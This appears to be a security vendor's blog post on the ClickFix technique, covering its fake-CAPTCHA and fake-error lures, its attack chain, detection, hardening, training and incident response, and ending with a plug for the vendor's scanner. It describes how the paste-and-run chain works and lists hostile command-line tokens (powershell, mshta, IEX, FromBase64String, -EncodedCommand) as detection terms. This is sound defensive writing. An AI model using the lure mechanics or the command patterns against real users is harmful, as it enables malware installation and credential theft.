A technique that was a researcher curiosity eighteen months ago is now one of the dominant malware delivery methods in email. It is called ClickFix and the mechanic is almost embarrassingly simple: the attacker convinces the victim to copy a piece of text, paste it into an operating system window and press Enter. What runs is PowerShell, mshta, curl or any interpreter Windows provides, executing with the user's own permissions.
The numbers explain why this deserves attention and a quick check against your own detection layer. ESET, in its telemetry report for the first half of 2025, recorded a 517% increase in ClickFix and FakeCAPTCHA campaigns compared with the second half of 2024. Microsoft published a dedicated analysis in August 2025, "Think before you Click(Fix)", confirming that the technique reaches thousands of devices a day in its global telemetry and ranks it among the most effective delivery methods seen in years.
Anatomy of the trap
What makes ClickFix difficult to cut off is that the wrapper changes every few months, while the mechanics stay the same: a page or a message convinces the user that the fix involves pasting something into a system window. Five disguises are circulating in 2025 and 2026, each documented in real campaigns.
Cloudflare-style fake CAPTCHA
The victim lands on a compromised page or one served through malvertising and meets the classic "verify you are human" widget. The usual checkboxes are deliberately broken. The page then offers an alternative: "step 1, press Win+R; step 2, press Ctrl+V; step 3, press Enter". What sits in the clipboard is already an obfuscated PowerShell line. The visual style mimics Cloudflare on purpose to lower friction.
Simulated Word, Chrome or video player error
Another widely observed variant in Proofpoint TA571 campaigns is the HTML attachment that renders a Microsoft Word error message such as "Word cannot display this document. To repair it, paste this command into PowerShell". The same pattern recurs with a fake Chrome failure, a missing video codec or a DNS error. The command always shares the same structure: download a second-stage script and run it.
Human verification on download pages
Recent campaigns have shifted the lure to pages offering pirated software, cracks, drivers, licence keys or AI tools. Before the download a screen asks the user to "verify you are not a bot". The verification, as with the earlier variant, is paste and execute.
Fake meeting links and travel reservations
In March 2025 Microsoft documented how Storm-1865 targeted the hospitality sector by impersonating Booking.com: legitimate-looking emails led to a fake reservation page whose CAPTCHA delivered the ClickFix payload. The same template has been reused with fake Microsoft Teams, Google Meet and Zoom invitations.
Fake Windows blue screen
The most recent variant, observed by incident response teams in the hospitality sector at the end of 2025, presents the victim with a full-browser blue screen mimicking the Windows BSOD. The "error" text asks the user to run a PowerShell command that supposedly repairs the system. The graphical fidelity is good enough that a non-technical user cannot reliably tell the simulation from the real screen.
What happens once the victim pastes and runs
The interesting part for a security team is not the lure: it is what happens in the seconds after Enter. A typical modern ClickFix chain follows four steps.
- Win+R opens the Run dialogue and the victim pastes the clipboard string. The activity is recorded in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is one of the strongest forensic sources once the incident has happened.
- The pasted string usually starts with powershell.exe, mshta.exe, curl, bitsadmin or conhost with parameters like -EncodedCommand or -WindowStyle Hidden. The line is written to look harmless when read left to right and ends with a comment that looks like a ticket ID or an error code.
- The interpreter downloads a second-stage script from a rotating domain, often a legitimate compromised host (WordPress, Pastebin, cloud storage). That second script is the actual loader: it adds persistence, disables controls where it can and loads the final payload in memory.
The final payload is well documented. Proofpoint and other teams have consistently linked ClickFix campaigns to Lumma Stealer, NetSupport RAT, AsyncRAT, DanaBot, Latrodectus and XWorm. ESET also reports StealC, Quasar RAT and, in targeted operations, bespoke implants. Intent varies: credential and session-cookie theft for financial fraud, pre-ransomware footholds, and espionage in nation-state activity.
State-aligned adoption matters when calibrating risk. Between October 2024 and April 2025 confirmed use of ClickFix was attributed to APT28 (Russia), Kimsuky (North Korea) and MuddyWater (Iran). That tends to happen only when a technique is mature enough to be reliable in real espionage operations.
Why traditional controls miss it
ClickFix does not arrive as a malicious attachment or a downloaded executable: what arrives is text. The victim copies and pastes a command that runs with their own permissions, inside a Microsoft-signed binary, without tripping most of the usual heuristics. Three concrete reasons explain the technique's success.
First, mail gateways see nothing malicious: the body is plain text. The intermediate page may be a freshly registered clean domain or a legitimate compromised site. Web filtering platforms tend to lag in categorising it.
Second, execution is initiated by the user inside their own session. Modern EDR and antivirus tooling does not block powershell.exe launched from explorer.exe by default: it is a routine sequence on any workstation. Catching it requires inspecting the command line rather than the binary.
Third, classic awareness programmes teach the user not to open attachments or click suspicious links. ClickFix asks for neither: it asks the user to paste text, which is an innocuous act in office culture. The defensive reflex is calibrated for the wrong action.
Detection that actually works
The good news is that ClickFix leaves a clear telemetry trail if you hunt in the right place. Three observation points are worth tuning today. KQL queries for Microsoft Defender XDR are publicly available and community-validated.
RunMRU as primary evidence
The registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU keeps what the user typed into the Run dialogue. On a healthy corporate workstation that key should not contain strings with powershell, mshta, curl, IEX, FromBase64String, encodedcommand or URLs. A rule firing on any of those terms in the creation or modification of the registry value produces close to zero false positives. Sysmon EventID 13 with the right filters covers the same ground if you do not run Defender for Endpoint.
Anomalous process tree
The chain explorer.exe to powershell.exe (or mshta.exe, conhost.exe, cmd.exe) with long encoded arguments is highly suspicious. Most EDR products allow alerts on command lines containing -EncodedCommand, -nop, -W hidden or IEX. If the organisation uses PowerShell legitimately for administration, restrict script logging and block non-constrained mode through AppLocker or WDAC so that ad-hoc scripts fail.
Post-execution network telemetry
The loader always talks to an external domain to fetch the second stage. An outbound connection from powershell.exe or mshta.exe to a freshly registered domain or a paste service should fire a high-severity alert. With a managed attack surface management programme in place, indicators can be cross-referenced against the suspicious-domain coverage you already monitor.
Defences that actually work
Once the behavioural tree is understood, defence moves from reactive detection to concrete preventive controls. There is no single switch that turns ClickFix off; what works is the combination of three layers.
Reduce endpoint surface
Microsoft Defender attack surface reduction (ASR) rules block several binaries the ClickFix chain depends on. The most useful documented rules against this technique are the ones that block obfuscated script execution, prevent Office applications from creating child processes, block process creation from PSExec or WMI commands, and stop execution of unsigned files from the endpoint. None is perfect; combined they raise the cost of the operation significantly for the attacker.
Beyond ASR, it is worth reviewing GPOs to limit who has the Run dialogue enabled on corporate workstations. Removing Win+R from standard profiles via policy does not break productivity and kills the most common lure. For administration or developer profiles, AppLocker or WDAC restricting which binaries can be invoked from interactive sessions does the same job without disrupting operations.
Lock down PowerShell and mshta
PowerShell Constrained Language Mode, script block logging enabled and shipped to the SIEM, transcription enabled and AMSI integrated form the minimum baseline. Mshta.exe rarely has legitimate use on an employee workstation and should be blocked outright on profiles that do not need it. Bitsadmin, certutil, regsvr32 and rundll32 are well-known LOLBins and deserve explicit WDAC rules.
Identity and response layer
When the payload steals credentials and session cookies, a well-designed authentication layer limits the blast of damage. Phishing-resistant MFA on privileged access, short sessions on critical applications and blocking of legacy authentication protocols work not because they prevent ClickFix but because they reduce the value of stolen cookies. Identity is the last line once the endpoint piece has failed.
Training that works, and training that does not
Traditional phishing simulations do not prepare the user for ClickFix. The recipient of the lure does not open an attachment or click a dodgy link: they see a message asking them to paste three lines and press Enter. If the security team has not explicitly trained that reflex, the user will comply.
What does teach the workforce is a short and clear operational rule: no legitimate vendor, no internal system and no website will ever ask you to paste commands into a system window. Ever. If you are asked, it is always a scam. That sentence, repeated in training, in internal signage and in technical onboarding, is more useful than five email-phishing simulations. For IT and development teams it is also worth training the reflex to read the command line before running it, especially when copying from Stack Overflow, ChatGPT or external documentation.
One interesting variant: part of the programme should simulate ClickFix internally with a harmless command (for instance, opening calc.exe and notifying the security team). That simulation, run with authorisation and prior communication to the works council where it applies, measures real risk far more accurately than another email simulation.
If your organisation has already been hit
Response to a ClickFix infection is response to an endpoint compromise with lateral-movement and credential-theft potential. Order matters: isolate the affected workstation, collect the RunMRU key and the process tree as evidence, rotate passwords and revoke session tokens for the affected account in Microsoft Entra ID or the equivalent IdP, scan the rest of the estate for the same indicators, and open the formal incident response procedure. Assume that a single endpoint was unlikely to be the only target: ClickFix campaigns typically bounce against several victims inside the same organisation before one succeeds.
When in-house capacity is not available to move through those steps within hours, a managed incident response service or a 24x7 managed SOC draws the line between a contained incident and a breach that requires regulatory notification.
What comes next
ClickFix is not going away in 2026. The technique is cheap, reliable and becoming commoditised: ClickFix-as-a-Service kits sold on forums already bundle CAPTCHA templates, rotating domains and payload choice. For a mid-sized organisation, preparing is not about buying a new tool, it is about tuning rules in the endpoint stack you probably already have, writing three hunting queries, reviewing PowerShell policies and redesigning awareness around that single sharp sentence. To support that work, an MSSP provider that combines managed SOC with incident response and knows your Microsoft 365 stack is the most reasonable support model when there is no in-house team able to hunt at this level.
For a quick view of the externally exposed side of the organisation before raising detection bars, Hard2bit Scanner returns the public posture of a domain in under a minute. It is the fastest starting point to learn where an attacker armed with a ClickFix lure would most likely arrive first.
Cited external sources
ESET Threat Report H1 2025 (Help Net Security): helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report. Microsoft Security Blog, "Think before you Click(Fix)" (21 August 2025): microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix. Microsoft on Storm-1865 and Booking.com (13 March 2025): microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com. Proofpoint, ClickFix landscape: proofpoint.com/us/blog/threat-insight/security-brief-clickfix. BleepingComputer, state-aligned actors adopt ClickFix: bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix. ASR rules reference (Microsoft Learn): learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference. KQL hunts for Defender XDR: kqlquery.com/posts/investigate-clickfix.